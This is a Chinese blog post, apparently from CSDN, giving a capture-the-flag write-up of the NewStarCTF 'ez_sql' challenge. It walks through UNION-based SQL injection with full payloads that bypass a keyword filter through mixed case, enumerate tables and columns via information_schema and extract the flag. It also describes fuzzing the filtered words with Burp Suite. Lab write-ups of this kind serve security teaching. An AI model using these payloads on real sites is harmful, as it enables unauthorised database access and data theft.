CTF刷题记录--[NewStarCTF ez_sql]--联合注入

已于 2024-09-28 21:43:59 修改
阅读量782 收藏 9
点赞数 20
文章标签: sql 数据库 网络安全
于 2024-09-28 21:27:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56019217/article/details/142621404
版权

解题思路

在这里插入图片描述
进入网页,发现是一个成绩查询界面。随便点击一个链接进入。
在这里插入图片描述注意搜索栏,发现有GET参数 id=TMP0919 ,且界面有回显,考虑使用SQL注入中的联合注入 。

确定参数闭合形式

先尝试单引号闭合
在这里插入图片描述发现页面没有任何回显,说明数据库查询指令被提前结束,初步判断闭合方式为单引号。我们再尝试双引号闭合
在这里插入图片描述回显 id not exists ,说明带双引号的参数被数据库代入查询了,进一步确定闭合形式为单引号。

安全意识不足的网站的数据库查询命令一般是这样的:

select 字段名 from 表名 where id='' LIMIT0,1;

我们已知id的闭合方式为单引号,所以当我们输入 TMP0919’ 后,这个命令内部是这样的:

select 字段名 from 表名 where id='TMP0919'' LIMIT0,1;

我们输入的单引号与前面的单引号匹配,导致多出一个单引号没法被解析,数据库报错,不会返回数据库内的数据。

这时我们再将后面的语句注释掉,让后面的语句失效。这里使用 --+ 的注释方式。
即输入 id=TMP0919’ --+ 。 代码就变成了下面这样:

select 字段名 from 表名 where id='TMP0919' --+' LIMIT0,1;

由于–+后面的代码会被注释掉,界面再次返回数据库内的数据。
在这里插入图片描述

确定字段数

接下来我们确定当前页面匹配的数据表的字段数,以便于后续在当前页面回显我们想要的数据。
这里使用 order by 字段数 代码。当我们输入字段数小于等于数据表字段数时,回显正常;当大于数据表字段数时,报错。我们通过是否报错判断字段数。
但是此处我们将字段数修改为任意数字都回显为 no!
这个回显明显不是数据库本身的报错,所以我们可以判断这里是网站代码对我们输入的参数进行了过滤,过滤掉了一些特殊字符。

所以我们将代码修改为 OrDer by 5 进行大小写绕过。
在这里插入图片描述成功回显,且在字段数为6时报错,为5时回显正常。说明字段数为5

确定各处回显所对应的字段数

这里使用联合注入 union select 1,2,3,4,5 来查询各处回显所对应的字段数。
这里注意 1,2,…,n 的数字数量一定要与字段数相同,这样就会在相应的位置显示相应的数字。
此处 select 被过滤,修改为 Select 绕过过滤。
因此此处的payload为:

?id=1TMP0919' union Select 1,2,3,4,5--+

注意这里在TMP0919前面加上了1,变成1TMP0919,这样数据库查不到1TMP0919这个数据,就不会回显id=TMP0919的数据在界面。如果不修改,界面依旧是id=TMP0919的数据,而每个位置对应的字段不会被显示。
在这里插入图片描述

查询库名、表名、字段名

我们将需要的数据回显在字段1上,于是payload分别为:

查询库名
?id=1TMP0919' union Select database(),2,3,4,5 --+
查询表名
?id=1TMP0919' union Select (Select group_concat(table_name) from infOrmation_schema.tables wHere table_schema='ctf'),2,3,4,5 --+
查询字段名
?id=1TMP0919' union Select (Select group_concat(column_name) from infOrmation_schema.columns wHere table_name='here_is_flag'),2,3,4,5 --+

查询得到库名为ctf
在这里插入图片描述查询表名发现information和where被过滤,修改为 infOrmationwHere
得到表名:
在这里插入图片描述flag明显在here_is_flag中,所以我们查询这个表的字段名:

在这里插入图片描述得到字段名 flag

查询flag字段的数据

payload如下:

?id=1TMP0919' union Select (Select flag from here_is_flag),2,3,4,5 --+

在这里插入图片描述
得到flag{e7aa67d2-e11d-41ee-a4a3-5656bcd65139}.
本题得解。

一些拓展

手工测试被过滤字段固然可行,但是如果可以利用相关字典,通过BurpSuite进行爆破,直接得到被过滤字段和未被过滤字段,便可以节省精力,缩短解题时间。

先创建一个相关字典:

order
by
union
select
group
concat
database
table
column
name
information
schema
where

利用burpsuite抓包,丢入intruder模块爆破:
在这里插入图片描述立刻得出了被过滤的四个字段。
在这里插入图片描述

Wh1teR0se
关注
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
2020-HackIM_ctf_hackim-ctfwriteup_
09-28
这是hackim-ctf的writeup
ctf-all-in-one
01-30
ctf-all-in-one
ctf-field-guide.zip_ctf_pdf
09-23
ctf介绍及相关培训介绍 学习ctf的注意事项
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
SQL - 进阶语法(一)
qq_51222843的博客
09-21 651
关于SQL的进阶语法教程,包括简单合并数据库,修改数据库内容等操作
[OPEN SQL] SELECT语句
Hudas的博客
09-23 566
本文主要讲解OPEN SQL读取数据的SELECT语句相关知识点
Transact-SQL概述(SQL Server 2022)
brucexia的专栏
09-23 1311
Transact-SQL是Microsoft公司在关系数据库管理系统SQL Server中的SQL3标准的实现,是微软对SQL的扩展。在SQL Server中,所有与服务器实例的通信都是通过发送Transact-SQL语句到服务器来实现的。根据其完成的具体功能,可以将Transact-SQL语句分为四大类,分别为数据操作语句、数据定义语句、数据控制语句和一些附加的语言元素。
Postgresql特殊关键字
czjnoe的博客
09-25 294
表字段名称如果出现这些特殊关键字,则需要通过单引号访问字段,如offset、group。PostgreSQL特殊关键字。
渗透测试工具 sqlmap 基础教程
2301_77160226的博客
09-25 673
一旦发现漏洞,sqlmap 可以自动利用漏洞获取数据库中的敏感信息,甚至可以获取数据库服务器的操作系统权限。sqlmap 是一款非常强大的渗透测试工具,它可以帮助我们快速检测和利用 SQL 注入漏洞。在使用 sqlmap 进行渗透测试时,一定要遵守法律法规,确保获得了合法的授权,并注意不要对目标系统造成过大的影响。在网络安全领域,渗透测试是一项至关重要的工作,它可以帮助我们发现系统中的安全漏洞,从而采取相应的措施进行修复。2.在 Windows 系统中,可以从 sqlmap 的官方网站下载安装包进行安装。
Python 课程18-SQLAlchemy
tim654654的博客
09-25 1132
SQLAlchemy ORM 中,表结构通过 Python 类表示。每个类代表数据库中的一张表,类的属性代表表中的列。定义模型类__tablename__ = 'users' # 表名SQLAlchemy 的func模块使得我们能够使用数据库中的聚合函数,如COUNTSUMMAX等。聚合查询# 查询用户的最大年龄# 计算特定条件下的总人数。
【达梦数据库】存储过程统计模式下表信息-SQL改写
最新发布
weixin_47686079的博客
09-26 361
在一次Oracle迁移Dm的过程中,源库&目的库大小写均敏感,执行客户提供的SQL脚本的过程中发现,表ip_address被系统默认成了表IP_ADDRESS。经过分析,客户提供的SQL没有使用双引号,来确保Oracle和Dm数据库按照指定的大小写来识别表名,因此,做以下改写。
脏读查询SQL SELECT查询配置(DM8:达梦数据库)
qq_37358909的博客
09-25 383
在某些增删改事务中 , 往一张表增删改数据时 , sql 未提交事务 , 查询表 数据显示 0 , 这时可以配置脏读 , 可以看到表中已经写入的数据设置某条查询语句为脏读。
多智能体笔记本专家系统:集成CrewAI、Ollama和自定义Text-to-SQL工具
李孟的博客
09-25 300
利用多智能体AI、CrewAI、Ollama和自定义Text-to-SQL工具实现个性化笔记本推荐
主流NoSQL及应用场景详解
qq_22201881的博客
09-24 1389
(编注0:本文以下内容英文出处:Kristóf Kovács)NoSQL数据库之间的不同,远超过两 SQL数据库之间的差别。针对这种情况,这里 Cassandra、 Mongodb、 CouchDB、 Redis、 Riak、 Membase、 Neo4j 和 HBase 进行了比较。我承认对 Cassandra有偏见,一部分是因为它本身的臃肿和复杂性,也因为 Java的问题(配置,出现异常,等等)虽然采用简单数据或以键值索引的哈希表,但也支持复杂操作,例如 ZREVRANGEBYSCORE。
10个降低性能的SQL问题及改进措施
csdn1561168266的博客
09-23 1095
大家好,在编写SQL查询时,很多人会出现一些降低性能的问题。本文将介绍在SQL查询中常出现的一些问题,以及如何避免这些问题以提高性能,示例将使用简单的员工名字和数据。假设有一个名为Employees现在来介绍一些常见的SQL问题。
PostgreSQL EXTRACT 日期函数
tangsiqi130的博客
09-23 321
EXTRACT
SQL_over_partition_by_order_by
-
09-25 368
• window_function: 窗口函数,如SUM(), AVG(), COUNT(), MIN(), MAX(), ROW_NUMBER(), RANK(), DENSE_RANK(), LEAD(), LAG()等。• RANK() OVER (PARTITION BY salesperson_id, YEAR(date) ORDER BY amount DESC): 计算每个销售人员在每个季度的销售额排名。我们想要计算每个销售人员的总销售额,并且想要知道每个销售人员在每个季度的销售额排名。
Postgresql怎么查询数据库中所有的表,odoo17数据库最依赖表整理
Python私教
09-25 449
我用的是odoo17,这个版本在国内的资料还比较少,我后面有时间就分享一下. 不然坑太多了, 我看了很多技术文章, 踩了很多不必要的坑.今天遇到了一个需求,需要梳理odoo中数据库表的分类,所以想要知道怎么查询当前数据库中所有的表,特此记录.不过我还想要根据表名升序,这样方便整理,所以加了个排序条件,SQL语句如下.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值